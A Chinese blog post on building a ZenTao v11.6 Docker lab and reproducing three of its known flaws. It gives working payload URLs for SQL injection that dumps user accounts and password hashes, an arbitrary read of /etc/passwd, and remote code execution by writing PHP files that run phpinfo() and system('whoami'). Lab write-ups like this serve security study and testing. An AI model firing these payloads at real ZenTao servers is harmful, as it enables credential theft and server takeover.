当前位置: 首页 > article >正文

禅道v11.6 基于linux环境下的docker容器搭建的靶场

一、环境搭建

linux环境下的

在docker环境下安装禅道CMS V11.6

docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6

二、常见问题

1.删除Docker容器镜像报错(同样适用于,在Docker下搭建靶场无法启用的方法)
image.png
不能删除正在运行的容器,需要先停止进程
image.png
再查看时就看到此靶场的进程被删除了
image.png
重新安装
image.png
查看当前进程,现实容器启用
image.png

扩展:Docker下的搭建靶场无法启用其他可能方法
①重启kali,在开启容器

登录后台时密码错误(输入正确密码还是登陆失败)
①可能是8084端口没开
②http://172.0.0.1:8084/install.php(注意标红的位置,进行重新安装以下尝试)

image.png

三、漏洞复现

1.SQL注入

Payload

http://127.0.0.1/api-getModel-api-sql-sql=select+account,password+from+zt_user

Poc访问结果
image.png

2.任意文件读取

Payload

http://127.0.0.1/api-getModel-file-parseCSV-fileName=/etc/passwd

Poc访问结果
image.png

3.RCE

Payload1

http://127.0.0.1/api-getModel-api-getMethod-filePath=1111/1


fileContent=<?php phpinfo()?> 

Poc访问结果
image.png
Payload2

http://127.0.0.1/api-getModel-api-getMethod-filePath=2222/2


fileContent=<?php system('whoami');?>

image.png


http://www.kler.cn/a/158946.html

相关文章:

  • 如何在 Ubuntu 上安装 Emby 媒体服务器
  • 深度学习神经网络创新点方向
  • pycharm分支提交操作
  • Ceph PG(归置组)的状态说明
  • Python3.11.9+selenium,选择证书用多线程+键盘enter解决
  • 前后端请求响应
  • Hadoop学习笔记(HDP)-Part.11 安装Kerberos
  • 基于Java swing 学生选课成绩管理系统
  • 周周爱学习之快速排序
  • Oracle merge into语句(merge into Statement)
  • java后端自学错误总结
  • 理解数据库事务和回滚:概念、实例与Python脚本实现
  • 罗技鼠标使用接收器和电脑重新配对
  • 亚信安慧AntDB受邀分享核心业务系统全域数据库替换实践
  • linux 僵尸进程 关闭看不见的进程
  • 【如何用批处理文件实现自动编译Keil工程和C# Visual Studio工程】
  • 用C语言实现单链表
  • 数据结构中处理散列冲突的四种方法
  • 控制台电商项目实现
  • 前端食堂技术周刊第 107 期:技术播客节、Deno Cron、FEDAY、XState v5、Electron 2023 生态系统回顾
  • C++ 12.5作业
  • unaipp引入echarts图表,小程序端能正常显示打包
  • 智能优化算法应用:基于堆优化算法无线传感器网络(WSN)覆盖优化 - 附代码
  • CC++内存管理方式
  • 第18章 C++11标准库(STL)
  • Spring Cloud + Vue前后端分离-第3章 SpringBoot项目技术整合